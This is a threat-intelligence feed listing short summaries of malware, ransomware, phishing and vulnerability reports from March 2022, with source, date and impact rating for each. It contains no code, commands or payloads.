- Cisco Talos researchers analysed relation between BlackCat ransomware and BlackMatter ransomware. Researchers has concluded with moderate confidence that the same affiliate are behind both the ransomware operators as same C2 Infrastructure used for certain attacks.
GhostWriter New Espionage Campaign Update
MEDIUM
+
—
- Intel Source:
- QI-ANXIN Threat Intelligence Center
- Intel Name:
- GhostWriter New Espionage Campaign Update
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- CERT-UA found and analysed a malicious zip file which contains the Microsoft Compiled HTML Help file named dovidka.chm. The malicious file was designed to spread malware for espionage purposes against targets located in Ukraine that displays the logos of the Ukrainian President’s office and secret services with content relating to advice on dealing with the bombing.
LokiLocker RaaS Targets Windows Systems
MEDIUM
+
—
- Intel Source:
- Blackberry
- Intel Name:
- LokiLocker RaaS Targets Windows Systems
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- A new ransomware as a service has been identified by BlackBerry researchers dubbed as LokiLocker. It targets English-speaking victims and Windows. The threat was first seen in the wild in mid-August 2021. LokiLocker encrypts victim’s files on local drives and network shares with a standard combination of AES for file encryption and RSA for key protection.
Cyclops Blink malware targets Asus Router
HIGH
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Cyclops Blink malware targets Asus Router
- Date of Scan:
- 2022-03-21
- Impact:
- HIGH
- Summary:
- Researchers from TrendMicro have analyzed technical capabilities of the Cyclops Blink malware variant that has been targeting ASUS routers and provides an extensive list of more than 150 current and historical Command and Control (C2) servers of the Cyclops Blink botnet.
Qakbot infection with Cobalt Strike and VNC
MEDIUM
+
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Qakbot infection with Cobalt Strike and VNC
- Date of Scan:
- 2022-03-18
- Impact:
- MEDIUM
- Summary:
- Researchers at SANS has disected
Gh0stCringe RAT targets MS-SQL and MySQL servers
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Gh0stCringe RAT targets MS-SQL and MySQL servers
- Date of Scan:
- 2022-03-17
- Impact:
- MEDIUM
- Summary:
- ASEC team has analysed and monitored a malware which being distrbuted to vulnerable MySQL and MSSQL servers. ASEC Team named the malware as Gh0stCringe also known as CirenegRAT.
WIZARD SPIDER massive phishing campaign
MEDIUM
+
—
- Intel Source:
- Prevailion
- Intel Name:
- WIZARD SPIDER massive phishing campaign
- Date of Scan:
- 2022-03-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Prevailion earlier this year has identified a massive phishing campaign focused on collecting credentials of Naver users. Naver is a popular South Korean online platform comparable to Google that offers a variety of services (e.g. email news and search among many others). Researchers found overlaps with infrastructure which is historically linked with WIZARD SPIDER a Russian-based threat actor motivated towards initial access and ransomware operations.
Russian Threat Actors exploits PrintNightMare Vulnerability
HIGH
+
—
- Intel Source:
- CISA
- Intel Name:
- Russian Threat Actors exploits PrintNightMare Vulnerability
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- In an Joint Advisory by FBI & CISA they are warning organizations that Russian state-sponsored threat actors have gained network access through exploitation of default MFA protocols and a known vulnerability. This advisory also provides TTPs IOCs and recommendations to protect against Russian state-sponsored malicious cyber activity.
CaddyWiper TTP_Seeder_Queries_15/03/222
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- CaddyWiper TTP_Seeder_Queries_15/03/222
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Pandora Ransomware
MEDIUM
+
—
- Intel Source:
- Cyble
- Intel Name:
- Pandora Ransomware
- Date of Scan:
- 2022-03-16
- Impact:
- MEDIUM
- Summary:
- Cyble Research Labs has analysed a sample of Pandora ransomware. After analysing the sampled Cyble believe that Pandora ransomware is a re-brand of ROOK ransomware as they observed similar behaviour in the past. Pandora ransomware gang is suspected of leveraging the double extortion method.
CaddyWiper Malware
HIGH
+
—
- Intel Source:
- ESET
- Intel Name:
- CaddyWiper Malware
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- ESET Researcher has idenfied third Wiper malware impacting Ukraine dubbed as CaddyWiper. This wiper is relatively smaller compiled size of just 9KB than previous wiper attacks. This is a developing threat currently only one hash is available.
EnemyBot - Linux based Botnet
HIGH
+
—
- Intel Source:
- Securonix
- Intel Name:
- EnemyBot - Linux based Botnet
- Date of Scan:
- 2022-03-16
- Impact:
- HIGH
- Summary:
- Securonix Threat Labs has identified a Linux based botnet dubbed as EnemyBot. STL correlates EnemyBot to LolFMe botnet which contains similar strings such as “watudoinglookingatdis”. The EnemyBot malware also have ability to steal data via HTTP POST which STL identified in their analysis the malware was sending the data back to the original IP address.
B1txor20 Botnet exploits Log4j vulnerability
MEDIUM
+
—
- Intel Source:
- netlab360
- Intel Name:
- B1txor20 Botnet exploits Log4j vulnerability
- Date of Scan:
- 2022-03-16
- Impact:
- MEDIUM
- Summary:
- Researchers at Qihoo 360's Netlab has captured an ELF file on their honeypot system which was first observed propagating through the Log4j vulnerability on February 9 2022. After closely analysing the file they named it B1txor20 based on the propogation using the file name 'b1t ' the XOR encryption algorithm and the RC4 algorithm key length of 20 bytes.
Decoding Dannabot malware
LOW
+
—
- Intel Source:
- Security Soup
- Intel Name:
- Decoding Dannabot malware
- Date of Scan:
- 2022-03-15
- Impact:
- LOW
- Summary:
- A researcher on security soup wrote about VBS based DanaBot downloader which have added pbfuscation scheme and few other TTPs to its arsenal.
NIGHT SPIDER Zloader Campaign
LOW
+
—
- Intel Source:
- CrowdStrike
- Intel Name:
- NIGHT SPIDER Zloader Campaign
- Date of Scan:
- 2022-03-15
- Impact:
- LOW
- Summary:
- Researchers from CrowdStrike tracked an ongoing widespread intrusion campaign leveraging bundled .msi installers to trick victims into downloading malicious payloads alongside legitimate software. This was used to execute NIGHT SPIDER’s Zloader trojan.
North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- North KoreanTTP/Babyshark Campaign_Seeder_Queries_15/03/22
- Date of Scan:
- 2022-03-15
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
GrimPlant and GraphSteel used to attack Ukraine
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- GrimPlant and GraphSteel used to attack Ukraine
- Date of Scan:
- 2022-03-15
- Impact:
- MEDIUM
- Summary:
- CERT-UA identified cyberattacks being launched by the UAC-0056 threat group targeting state authorities of Ukraine using phishing emails with instructions on improving information security that would deliver an executable leading to a Cobalt Strike beacon.
Dirty Pipe vulnerability in Linux kernel
HIGH
+
—
- Intel Source:
- SecureList
- Intel Name:
- Dirty Pipe vulnerability in Linux kernel
- Date of Scan:
- 2022-03-15
- Impact:
- HIGH
- Summary:
- Security researcher Max Kellermann discovered a high severity vulnerability in the Linux kernel which can be used for local privilege escalation. It affects the Linux kernels from 5.8 through any version before 5.16.11 5.15.25 and 5.10.102 and can be used for local privilege escalation.
Sockbot in GoLand
MEDIUM
+
—
- Intel Source:
- Security Joes
- Intel Name:
- Sockbot in GoLand
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Security Joes incident response team responded to malicious activity in one of their clients' network infrastructure. During the investigation it was discovered that the threat actors used two customized GoLang-compiled Windows executables “lsassDumper” and “Sockbot” to perform the attack.
Kwampirs Malware Linked to Shamoon APT
MEDIUM
+
—
- Intel Source:
- Cylera
- Intel Name:
- Kwampirs Malware Linked to Shamoon APT
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cylera Labs assess with medium to high confidence that Shamoon and Kwapirs are the same group or close collaborators sharing updates techniques and code over the course of multiple years. Evolution of Kwampris and its connections with Shamoon 1 and 2 are also well documented in the recent report by Cylera.
Brazilian trojan targets Portuguese users
LOW
+
—
- Intel Source:
- seguranca-informatica
- Intel Name:
- Brazilian trojan targets Portuguese users
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- A new variant of Brazilian trojan have targeted users from Portugal and there seems to be no difference in terms of sophistication in contrast to other well-known trojans such as Maxtrilha URSA and Javali.The trojan has been disseminated via phishing templates impersonating Tax services in Portugal.
TunnelVision exploits VMWare Horizon Servers
MEDIUM
+
—
- Intel Source:
- esentire
- Intel Name:
- TunnelVision exploits VMWare Horizon Servers
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from esentire found suspicious account creation and credential harvesting attempts on a customer’s endpoint and it was tracked to VMware Horizon server. The attack with high confidence was linked to TunnelVision Iranian-aligned threat actor.
Remcos RAT distribution campaign take advantage of Ukraine Invasion
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Remcos RAT distribution campaign take advantage of Ukraine Invasion
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Cisco Talos Reserachers has observed that Threat Actors are using Email lures themes related to Russia-Ukraine conflict fundraising and humanitrain support. These emails are related to scam activity and delivering Remcos RAT.
CryptBot Infostealer disguised as Cracked Software
LOW
+
—
- Intel Source:
- Blackberry
- Intel Name:
- CryptBot Infostealer disguised as Cracked Software
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry cam across a new and improved version of the malicious infostealer CryptBot which have been released via compromised pirated sites which appear to offer “cracked” versions of popular software and video games.
Infostealer Distributed via YouTube
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Infostealer Distributed via YouTube
- Date of Scan:
- 2022-03-14
- Impact:
- LOW
- Summary:
- ASEC researchers has discovered an Infostealer being distributed voa YouTube. The threat actor disguised the malware as a game hack and uploaded the video on YouTube with dowload link of the malware.
Formbook/XLoader targets Ukraine Government Officials
MEDIUM
+
—
- Intel Source:
- Netskope
- Intel Name:
- Formbook/XLoader targets Ukraine Government Officials
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Netskope Threat Labs has analysed a phishing email targeting high-rank government officials in Ukraine. The email seems to be part of new spam campaign which contians infected spreadsheet. The email also contians a .NET executable responsible for loading Formbook malware in a multi-stage chain.
Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Disguised malware exploit Ukrainian sympathizers- Liberator tool analysis
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers analysed the malware/tool called 'Liberator' by disBalancer group. Furthermore the post has been updated with two new IoCs.
Russian Threat Actors using Google Ad Delivery Network
MEDIUM
+
—
- Intel Source:
- NovaSOC
- Intel Name:
- Russian Threat Actors using Google Ad Delivery Network
- Date of Scan:
- 2022-03-14
- Impact:
- MEDIUM
- Summary:
- Researchers from Novasoc caught Russian Actors Utilizing Google Ad Delivery Network to Establish Browser Connections. Russian IP addresses has been using the Google ad delivery network as a mechanism to initiate client network connections.
Online Contact forms delivering BazarLoader
MEDIUM
+
—
- Intel Source:
- Abnormal
- Intel Name:
- Online Contact forms delivering BazarLoader
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Cybercriminals are always looking for new ways to targets users Researchers at Abnormal Security has identified attacks targeting users through an online contact form. They also observed that these attacks leads to deliverying BazarLoader malware.
Email interjection by Qakbot
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- Email interjection by Qakbot
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Sophos Labs have discovered Qakbot botnet's new technique where the botnet spread itself around by inserting malicious replies into the middle of existing email conversations. These email interruption is in the form of reply-all message include a short sentence and a link to download a zip file containing a malicious office document.
FormBook malware targets Ukrainians
MEDIUM
+
—
- Intel Source:
- Malwarebytes
- Intel Name:
- FormBook malware targets Ukrainians
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- MalwareBytes researchers discovered recently discovered about a malicious spam campaign dropping the Formbook stealer specifically targeting Ukrainians. The email lure which are being sent is written in Ukrainian.
LazyScripter APT H-Worm campaign
MEDIUM
+
—
- Intel Source:
- Lab52
- Intel Name:
- LazyScripter APT H-Worm campaign
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Researchers at Lab52 has tracked the activity of LazyScripter APT and discovered a new malware and new elements of infrastructure under LazyScripter arsenal. Further analysing the LazyScripter malware they found the usage of popular and open source online obfuscating tool for scripts which would inject their own downloader for njRAT.
MuddyWater subgroup leveraging maldocs and RATs
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- MuddyWater subgroup leveraging maldocs and RATs
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Cisco Talos believe with high confidence that there are sub-groups operating under MuddyWater umberalla targeting Turkey and Arabian peninsula countries with maldocs and Windows script file based RAT. These subgroups are highly motivated to conduct espionage intellectual property theft implant malware and ransomware in targeted network.
Disguised malware exploit Ukrainian sympathizers
MEDIUM
+
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Disguised malware exploit Ukrainian sympathizers
- Date of Scan:
- 2022-03-11
- Impact:
- MEDIUM
- Summary:
- Threat Actors are attempting to exploit Ukrainian sympathizers by offering malware as cyber tools to target Russian entities. Cisco Talos analysed one such instance where a threat actor offering DDoS tool on Telegram to target Russian websites. They downloaded the file and found it to be a infostealer malware.
Racoon Stealer leverages Telegram
LOW
+
—
- Intel Source:
- Avast
- Intel Name:
- Racoon Stealer leverages Telegram
- Date of Scan:
- 2022-03-10
- Impact:
- LOW
- Summary:
- Researchers from Avast recently noted Raccoon Stealer which is a password stealing malware using the Telegram infrastructure to store and update actual C&C addresses. Raccoon Stealer is getting distributed via downloaders: Buer Loader and GCleaner.
Prometheus Ransomware Decrypted
LOW
+
—
- Intel Source:
- Avast
- Intel Name:
- Prometheus Ransomware Decrypted
- Date of Scan:
- 2022-03-10
- Impact:
- LOW
- Summary:
- Avast researchers have recently released decryptor for the Prometheus Ransomware. Prometheus is a ransomware strain written in C# that inherited a lot of code from an older strain called Thanos.
Conti Ransomware Indicator of Compromise
HIGH
+
—
- Intel Source:
- FBI FLASH
- Intel Name:
- Conti Ransomware Indicator of Compromise
- Date of Scan:
- 2022-03-10
- Impact:
- HIGH
- Summary:
- A join advisory has been released by FBI NSA and CISA detailing about the updated indicators of compromise of Conti ransomware and their TTPS. The ransomware have been very active and have included attack vectors like TrickBot and CobaltStrike.
Emotet Resurgence
HIGH
+
—
- Intel Source:
- Lumen
- Intel Name:
- Emotet Resurgence
- Date of Scan:
- 2022-03-10
- Impact:
- HIGH
- Summary:
- The infamous malware 'Emotet' returned on November 2021 after a 10 month gap is once again showing signs of steady growth. Researchers at Lumen Black Lotus Labs have determined a strong resurgence of Emotet with 130 000 unique bots spread across 179 countries since its return.
UNC1151_TTP_Seeder_Queries_070322
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- UNC1151_TTP_Seeder_Queries_070322
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
Agent Tesla RAT campiagn
HIGH
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Agent Tesla RAT campiagn
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- FortiGaurd Labs analysed a phishing email impersonate as Ukraine based materials and chemical manufacturing company sharing purchase order. The phishing email has PPT as attachment that is multi-stage efforts to deploy the Agent Telsa RAT.
GhostWriter New Espionage Campaign
MEDIUM
+
—
- Intel Source:
- CERT-UA
- Intel Name:
- GhostWriter New Espionage Campaign
- Date of Scan:
- 2022-03-09
- Impact:
- MEDIUM
- Summary:
- CERT-UA found and analysed a malicious zip file which contains the Microsoft Compiled HTML Help file named dovidka.chm. The malicious file was designed to spread malware for espionage purposes against targets located in Ukraine that displays the logos of the Ukrainian President’s office and secret services with content relating to advice on dealing with the bombing.
APT41_TTP_Seeder_Queries_070322
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- APT41_TTP_Seeder_Queries_070322
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
RURansom Wiper Targets Russia
LOW
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- RURansom Wiper Targets Russia
- Date of Scan:
- 2022-03-09
- Impact:
- LOW
- Summary:
- Recently TrendMicro researchers analyzed sample released by MalwareHnterTeam which as per them is a wiper but decoyed like a ransomware and it was targeting Russia. The malware is written in .NET programming language and spreads as a worm.
APT41 targeting US Government
HIGH
+
—
- Intel Source:
- Mandiant
- Intel Name:
- APT41 targeting US Government
- Date of Scan:
- 2022-03-09
- Impact:
- HIGH
- Summary:
- Researchers at Mandiant claiming that they became aware of a campaign in May 2021 when they were called in to investigate an attack on US government network. An analysis revealed that the attack had likely carried out by Chinese nation state group APT41. Researchers has confirmed that the hackers have compromised the networks of at least six U.S. state government organizations between May 2021 and February 2022.
Nokoyawa Ransomware linked to Hive
MEDIUM
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Nokoyawa Ransomware linked to Hive
- Date of Scan:
- 2022-03-09
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers came across a new ransomware which had similarities with Hive ransomware like their attack chain teh tools used to the order in which they execute various steps. Most of targets of the ransomware are located in South America.
RagnarLocker Ransomware IoCs
MEDIUM
+
—
- Intel Source:
- FBI FLASH
- Intel Name:
- RagnarLocker Ransomware IoCs
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- Federal Bureau of Investigation (FBI) published a new FLASH report that provides additional IOCs associated with RagnarLocker ransomware. The FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware.
Emotet recent campaign using MS Excel
HIGH
+
—
- Intel Source:
- Fortinet
- Intel Name:
- Emotet recent campaign using MS Excel
- Date of Scan:
- 2022-03-08
- Impact:
- HIGH
- Summary:
- Fortinet researchers has conducted a deep research on 500 Excel files which were involved in delivering Emotet Trojan. Researchers analysed the Excel file leveraged to spread Emotet anti-analysis techniques used persistence on victim's deivce communicates with C2 servers and how modules are delivered loaded and executed on target system.
Webhards distributing njRAT
LOW
+
—
- Intel Source:
- ASEC
- Intel Name:
- Webhards distributing njRAT
- Date of Scan:
- 2022-03-08
- Impact:
- LOW
- Summary:
- ASEC researchers has identified njRAT malware is being distributed through webhard. Webhard is a platform used to distribute malware and it is mainly used by attackers to target Korean users. The malware disguised as an adult game that was uploaded in webhard.
Threat Landscape around Ukraine
MEDIUM
+
—
- Intel Source:
- Intel Name:
- Threat Landscape around Ukraine
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- The Google Threat Analysis Group (TAG) has observed phishing campaigns and espionage activity from a range of threat actors including FancyBear (APT28) and Ghostwriter targeting Ukraine. Activities from Mustang Panda was also noted.
PROPHET SPIDER Exploits Citrix ShareFile
MEDIUM
+
—
- Intel Source:
- CrowdStrike
- Intel Name:
- PROPHET SPIDER Exploits Citrix ShareFile
- Date of Scan:
- 2022-03-08
- Impact:
- MEDIUM
- Summary:
- CrowdStrike Inteligence team has investigated an incident where PROPHET SPIDER targeting Microsoft IIS by exploiting CVE-2021-22941. PROPHET SPIDER first spotted on May 2017 that intially access to the targeted networks by compromising vulnerable web servers.
TA416 targets European Government
HIGH
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA416 targets European Government
- Date of Scan:
- 2022-03-08
- Impact:
- HIGH
- Summary:
- Researchers at Proofpoint has discovered a Threat group TA416 targeting European diplomatic entities including an individuals involve in refguee and migrant services. TA416 group has assessed to be aligned with Chinese nation state which exploits web vulnerabilities to profile their targets. Researchers identified the campaign is escalated since the tension between Russia Ukraine and NATO members in Europe.
FormBook targets Oil & Gas companies
MEDIUM
+
—
- Intel Source:
- Malwarebytes
- Intel Name:
- FormBook targets Oil & Gas companies
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- During our random intel gathering we identified a tweet from Malwarebytes Threat Intelligence which states that FormBook continues to target Oil and Gas Companies. It also has potential IoCs. Few hours later Malwarebytes has published a blog with the findings. The campaign was delivered by a targeted email that contained two attachments one is a pdf file and the other an Excel document.
Global credential harvesting campaign
MEDIUM
+
—
- Intel Source:
- Curated Intel
- Intel Name:
- Global credential harvesting campaign
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- Researchers from Curated Intelligence recently tracked a new global credential harvesting campaign targeting Microsoft accounts through a range of phishing emails masquerading as ‘shared document’ notifications which deliver an embedded URL that leads to a fake Adobe Document Cloud application login page.
AvosLocker group new variant targets Linux systems
MEDIUM
+
—
- Intel Source:
- Qualys
- Intel Name:
- AvosLocker group new variant targets Linux systems
- Date of Scan:
- 2022-03-07
- Impact:
- MEDIUM
- Summary:
- AvosLocker ransomware group made its first presence in June 2021 targeting Windows machine. Recently researchers at Qualys has identified that the AvosLocker group is also targeting Linux environments. The AvosLocker ransomware group advertises their latest ransomware variants on the Darkweb Leak site and mentioned that tthey have added support for encrypting Linux systems specifically targeting VMware ESXi virtual machines.
Cyber campaign against Indian Government
LOW
+
—
- Intel Source:
- Telsy
- Intel Name:
- Cyber campaign against Indian Government
- Date of Scan:
- 2022-03-07
- Impact:
- LOW
- Summary:
- Researchers from Telsy identified a spear phishing campaign targetting Indian government. The threat actors are using legitimate portal as C2 and encrypted HTTPS communication. Legitimate sites were used as cobalt strike C&C.
Multi malware campaign on Ukraine
HIGH
+
—
- Intel Source:
- Trend Micro
- Intel Name:
- Multi malware campaign on Ukraine
- Date of Scan:
- 2022-03-04
- Impact:
- HIGH
- Summary:
- Trend Micro Research have verified and validated a number of alleged cyber attacks carry out by multiple groups in support of both the countries Russia Ukraine. Researchers have analysed internal data and external reports to provide these information.
Domains Linked to Phishing Attacks Targeting Ukraine
MEDIUM
+
—
- Intel Source:
- SecureWorks
- Intel Name:
- Domains Linked to Phishing Attacks Targeting Ukraine
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- Researchers at SecureWorks CTU has investigated a warning published by CERT-UA on 25th Feb 2022 regarding the phishing attacks targeting Ukrainian military personnel and government. Researchers attributed this campaign to MOONSCAPE threat group whereas CERT-UA attributed to UNC1151 APT group linked to Belarusian government.
DanaBot attacks Ukrainian MOD
MEDIUM
+
—
- Intel Source:
- Zscaler
- Intel Name:
- DanaBot attacks Ukrainian MOD
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- On 2 Mar 2022 in the midst of Russia Ukraine conflict Zscaler identified a threat actor launched an HTTP-based DDoS attack against the Ukrainian Ministry of Defense's webmail server. The threat attack is using DanaBot to launch DDoS attack and deliver second-stage malware payload using the download and execute command.
Russia-Ukraine Conflict Leverages Phishing Themes
MEDIUM
+
—
- Intel Source:
- Cofense
- Intel Name:
- Russia-Ukraine Conflict Leverages Phishing Themes
- Date of Scan:
- 2022-03-03
- Impact:
- MEDIUM
- Summary:
- As Russia Ukraine conflict on the ground and cyber front going hand in hand. Cofense Phishing Defense Center monitoring phishing emails related to the conflict and has identifed malicious campaign that are using conflict as a lure to target users and enterprises. However Cofense do not have any evidence to support the phishing campaign attribution towards the countries directly involved in war.
DDoS botnets cryptominers exploits Log4shell
MEDIUM
+
—
- Intel Source:
- Barracuda
- Intel Name:
- DDoS botnets cryptominers exploits Log4shell
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Barracuda researchers have analyzed botnet and cryptobots exploiting Log4shell vulnerabilities and it has been constant since two months. They noticed that major of attacks came from IP addresses in the U.S. with half of those IP addresses being associated with AWS Azure and other data centers.
Vollgar CoinMiner targets MSSQL
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Vollgar CoinMiner targets MSSQL
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC is monitoring a specific form of CoinMiner that has been consistently distributed to vulnerable MS-SQL servers. ASEC Infrastructure has detected Vollgar CoinMiner samples in the logs. Vollgar is a typical CoinMiner that is installed via brute force attacks against MS-SQL servers with vulnerable account credentials.
TrickBot upgrades AnchorDNS Backdoor
MEDIUM
+
—
- Intel Source:
- Security Intelligence
- Intel Name:
- TrickBot upgrades AnchorDNS Backdoor
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from IBM discovered a updated version of Trickbot Group’s AnchorDNS backdoor being used in recent attacks ending with the deployment of Conti ransomware. AnchorDNS is notable for communicating with its Command and Control (C2) server using the DNS protocol.
SoulSearcher Malware
MEDIUM
+
—
- Intel Source:
- Fortinet
- Intel Name:
- SoulSearcher Malware
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have analyzed the evolution of SoulSearcher Malware which have been targting Windows and collecting ssensitive information and executes additional malicious modules.
Emotet Malware Updated TTPs
MEDIUM
+
—
- Intel Source:
- Cyble
- Intel Name:
- Emotet Malware Updated TTPs
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Cyble researchers came across email phishing campaigns by Emotet malware and these were similar to old ones which used spam emails with malicious MS Excel files as the initial attack vector to infect targets. It was also observed that Emotet is rebuilding its botnet with the help of the TrickBot malware.
Magniber Ransomware being Redistributed
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- Magniber Ransomware being Redistributed
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- ASEC researchers has identified a redistribution campaign by Magniber ransomware which disguised itself as Windows update files. The distributed magniber files have normal Windows Installer (MSI) as their extension. Magniber ransomware is currently distributed using typosquating techniques targeting Chrome and Edge users with the latest Windows version.
Conti Leaks_Seeder_Queries_010322
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- Conti Leaks_Seeder_Queries_010322
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322
HIGH
+
—
- Intel Source:
- STR
- Intel Name:
- RU Threat Actors TTPs_Phishing Campaign_Seeder_Queries_010322
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
TA445 Targets European Governments
HIGH
+
—
- Intel Source:
- Proofpoint
- Intel Name:
- TA445 Targets European Governments
- Date of Scan:
- 2022-03-02
- Impact:
- HIGH
- Summary:
- The Proofpoint Threat Research team has identified a likely nation-state sponsored phishing campaign using a possibly compromised Ukrainian armed service member’s email account to target European government personnel with a Lua-based malware dubbed SunSeed.
Conti and Karma attacked Healthcare
MEDIUM
+
—
- Intel Source:
- Sophos
- Intel Name:
- Conti and Karma attacked Healthcare
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Sophos Labs researchers identified that two ransomware groups Conti & Karma have exploited ProxyShell vulnerabilty to gain access to the network of healthcare provider in Canada with very different tactics. Karma group exfiltrated data but did not encrypt the targeted systems. While Conti came into the network later but but encrypted the targeted systems.
Daxin Backdoor espionage campaign
MEDIUM
+
—
- Intel Source:
- Symantec
- Intel Name:
- Daxin Backdoor espionage campaign
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec found a new highly sophisticated piece of malware being used by a Chinese threat actor and the backdoor is dubbed as Daxin. Most of the targets have been government organizations and have been interest of China. The malware has been also called the most advanced type ever used by China linked threat actors.
BlackCat Ransomware- Technical Analysis
MEDIUM
+
—
- Intel Source:
- AT&T
- Intel Name:
- BlackCat Ransomware- Technical Analysis
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- AT&T researchers recently analyzed BlackCat ransomware samples which was quite active in Jan 2022. The keytakaways from their analysis was that the ransomware is coded in Rust and targets multiple platform WINDOWS AND LINUX.
BABYSHARK Malware
MEDIUM
+
—
- Intel Source:
- Huntress
- Intel Name:
- BABYSHARK Malware
- Date of Scan:
- 2022-03-02
- Impact:
- MEDIUM
- Summary:
- Researchers at Huntress has identified a APT group activity which was attributed to North Korean threat actors targeting national security institutes. The North Korean APT using a malware family called BABYSHARK this variant of malware customized to specific victim environment.
Electron Bot - SEO poisoning malware
MEDIUM
+
—
- Intel Source:
- Checkpoint
- Intel Name:
- Electron Bot - SEO poisoning malware
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers at Check Point Research has identifed a new malware dubbed as Electron Bot which has infected over 5000 active machines worldwide and being distributed through Microsoft’s official store. Electron Bot is a modular SEO poisoning malware which is used for social media promotion and click fraud. Once malware persist inside the targeted system it executes attacker commands such as controlling social media accounts on Facebook Google and Sound Cloud.
ColdStealer Infostealer
MEDIUM
+
—
- Intel Source:
- ASEC
- Intel Name:
- ColdStealer Infostealer
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Researchers from ASEC has analysed a new type of Infostealer dubbed as ColdStealer it disguises as a software download for cracks and tools. There are two type of distribution methods used by ColdStealer first it distribute single type of malware like CryptBot or RedLine secondly Dropper type malware.
UNC3313 targets MiddleEast government
MEDIUM
+
—
- Intel Source:
- Mandiant
- Intel Name:
- UNC3313 targets MiddleEast government
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Mandiant researchers recently responded to an intrusion activity by UNC3313 who were targetting Middle East government also new targeted malware was used Gramdoor and Starwhale. The whole process started with targted spear phishing email.
QakBot Campaign with old Tactics
MEDIUM
+
—
- Intel Source:
- Cofense
- Intel Name:
- QakBot Campaign with old Tactics
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
- Confense Phishing Defense Center has analysed emails delivering Qakbot that use a familiar tactic which is used in old emails.
Spear Phishing attacks on Ukraine
MEDIUM
+
—
- Intel Source:
- Palo Alto
- Intel Name:
- Spear Phishing attacks on Ukraine
- Date of Scan:
- 2022-03-01
- Impact:
- MEDIUM
- Summary:
